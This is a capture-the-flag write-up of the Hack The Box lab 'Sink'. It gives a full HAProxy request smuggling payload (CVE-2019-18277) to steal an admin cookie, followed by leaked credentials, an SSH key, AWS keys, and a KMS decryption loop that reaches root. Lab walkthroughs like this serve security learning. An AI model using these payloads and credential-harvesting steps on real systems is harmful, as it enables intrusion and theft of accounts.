Introduction@Sink:~$

Column	Details
Name	Sink
IP	10.10.10.225
Points	50
Os	Linux
Difficulty	Insane
Creator	MrR3boot
Out On	24 Oct 2020

Pwned

Recon

Nmap

     ┌─[root@d3dsec]─[~/Desktop/HTB/Sink]└──╼ #nmap -sC -sV -p- 10.10.10.225 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)3000/tcp open ppp?3971/tcp filtered lanrevserver5000/tcp open http Gunicorn 20.0.05502/tcp filtered fcp-srvr-inst115587/tcp filtered unknown33076/tcp filtered unknown33578/tcp filtered unknown34042/tcp filtered unknown35365/tcp filtered unknown35514/tcp filtered unknown37653/tcp filtered unknown49460/tcp filtered unknown52393/tcp filtered unknown61352/tcp filtered unknown62934/tcp filtered unknown64002/tcp filtered unknownService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds  
  

5000:devops 3000:gitea

Port-5000

There is a simple Sign in Page.

Port-5000

Let's register and log in.

Sink.htb

We Log In successfully.

Sink.htb

After some enumeration i found something interesting.

Server : gunicorn/20.0.0
Via : haproxy

Sink.htb

After some google i found CVE-2019-18277 request smuggling vulnerability

Link : HAProxy HTTP request smuggling (CVE-2019-18277)

I share a vedio for better Understanding.

Link : (CVE-2019-18277) POC

After reading the article and watch the vedio it's time for practical.

I post a comment and capture the request on burp repeater.

Sink.htb

Let's edit the request.

Sink.htb

Change the req and add the same Cookie and _csrf token but don't chage your session cookie.

     POST /comment HTTP/1.1Host: 10.10.10.225:5000User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 357Origin: http://10.10.10.225:5000DNT: 1Connection: keep-aliveReferer: http://10.10.10.225:5000/homeCookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6ImRlZHNlY0BzaW5rLmh0YiJ9.YCS9Ag.Q2lHGbCIpw_j32RHAgV1Wf3Q8_oUpgrade-Insecure-Requests: 1Transfer-Encoding: Cwo=chunked5msg=a0POST /comment HTTP/1.1Host: localhost:5000Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6ImRlZHNlY0BzaW5rLmh0YiJ9.YCS9Ag.Q2lHGbCIpw_j32RHAgV1Wf3Q8_oContent-Length: 300Connection: keep-aliveContent-Type: application/x-www-form-urlencodedmsg=  
  

Sink.htb

Now you see a "Cwo=" this is base64 encode string you need to select this and press "control+shift+b" to unbase64 this and then your req look like this which will be show in the photo.

Sink.htb

Now send the req.

Sink.htb

Now reload the home page and you got the admin cookie.

     Comment By: dedsecGET /notes/delete/1234 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Accept-Encoding: gzip, deflateAccept: */*Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YCSoRQ.Al5wRr7IJ-1JDg1HBnOmbwtpVAsX-Forwarded-For: 127.0.0.1 Delete   
  

     Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YCSoRQ.Al5wRr7IJ-1JDg1HBnOmbwtpVAs  
  

Sink.htb

Now add the admin cookie using cookie editor and reload the page.

Link : Cookie-Editor

Sink.htb

We are admin now let's check the notes.

Sink.htb

There is three notes Let's check all.

Sink.htb

Note 1

Sink.htb

Note 2

Sink.htb

Note 3

Sink.htb

We got three creads.

     Note1:Chef Login : http://chef.sink.htbUsername : chefadmPassword : /6'fEGC&zEx{4]zzNote2:Dev Node URL : http://code.sink.htbUsername : rootPassword : FaH@3L>Z3})zzfQ3Note3:Nagios URL : https://nagios.sink.htbUsername : nagios_admPassword : g8<H6GK\{*L.fB3C  
  

Let's try these creads on port 3000.

Sink.htb

Let's try root cread first.

Sink.htb

We got login successfully.

Sink.htb

After some enumeration i found a id_rsa_marcus key of marcus.

Location : http://10.10.10.225:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e

Sink.htb

id_rsa_marcus

Let's ssh in.

     vim id_rsa_marcuschmod 600 id_rsa_marcusssh -i id_rsa_marcus marcus@10.10.10.225  
  

Sink.htb

Let's get our user.txt.

Sink.htb

Privilege escalation

In the previous enumeration on port 3000 i also found a file called e8d68917f2570f3695030d0ded25dc95738fb1ba which has key and secret it is mainly a aws operation.

      location : http://10.10.10.225:3000/root/Log_Management/commit/e8d68917f2570f3695030d0ded25dc95738fb1ba  
  

     <?phprequire 'vendor/autoload.php';use Aws\CloudWatchLogs\CloudWatchLogsClient;use Aws\Exception\AwsException;$client = new CloudWatchLogsClient([ 'region' => 'eu', 'endpoint' => 'http://127.0.0.1:4566', 'credentials' => [ 'key' => 'AKIAIUEN3QWCPSTEITJQ', 'secret' => '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' ], 'version' => 'latest']);try {$client->createLogGroup(array( 'logGroupName' => 'Chef_Events',));}catch (AwsException $e) { echo $e->getMessage(); echo "\n";}try {$client->createLogStream([ 'logGroupName' => 'Chef_Events', 'logStreamName' => '20201120']);}catch (AwsException $e) { echo $e->getMessage(); echo "\n";}?>  
  

Sink.htb

Let's configure the aws console inside ssh connection.

     aws configureAWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQAWS Secret Access Key [None]: paVI8VgTWkPI3jDNkdzUMvK4CcdXO2T7sePX0ddFDefault region name [None]: us-west-2Default output format [None]: json  
  

After that let's list the secrets

     aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager list-secrets  
  

Sink.htb

Got the david password.

     aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-HRbzR"  
  

     Username = davidPassword = EALB=bcC=`a7f2#k  
  

Sink.htb

Change the user with david

     su davidEALB=bcC=`a7f2#k  
  

Sink.htb

I found the servers.enc file inside /home/david/Projects/Prod_Deployment. this is an encrypted file.

decrypt the file still needs to be operated through aws

Sink.htb

After analyze the file i found that this project comes with listkeys, and it reports an error when running directly We need to change the version inside to latest one.

So let's configure the aws first with the david user.

     aws configureAWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQAWS Secret Access Key [None]: paVI8VgTWkPI3jDNkdzUMvK4CcdXO2T7sePX0ddFDefault region name [None]: us-west-2Default output format [None]: json  
  

After that let's list the keys.

     aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys  
  

Sink.htb

Now we need to decrypt the keys.

     for KEY in $(aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys | grep KeyId | awk -F\" '{ print $4 }'); do aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "${KEY}"; aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "${KEY}" --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext"; done  
  

Sink.htb

Now let's decrypt this base64 string with CyberChef

Link : CyberChef

Sink.htb

Now click on servers.yml and we got the root password.

User : admin
Password : _uezduQ!EY5AHfe2

Sink.htb

Now let's ssh in with root.

     ssh root@10.10.10.225  
  

Sink.htb

And got our root.txt

Sink.htb

And we pwned it …….

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

Topic	Url
HAProxy HTTP request smuggling (CVE-2019-18277)	https://nathandavison.com/blog/haproxy-http-request-smuggling
(CVE-2019-18277) POC	https://www.youtube.com/watch?v=nq0ndhkfV_M
Cookie-Editor	https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/
CyberChef	https://gchq.github.io/CyberChef/

Hackthebox Sink writeup

Introduction@Sink:~$

Pwned

Recon

Nmap

Port-5000

id_rsa_marcus

Privilege escalation

Resources

Recent Update

Trending Tags

Hackthebox Sink writeup

Introduction@Sink:~$

Pwned

Recon

Nmap

Port-5000

id_rsa_marcus

Privilege escalation

Resources

Recent Update

Further Reading

Hackthebox Jewel writeup

Hackthebox Reel2 writeup

Hackthebox Doctor writeup

Trending Tags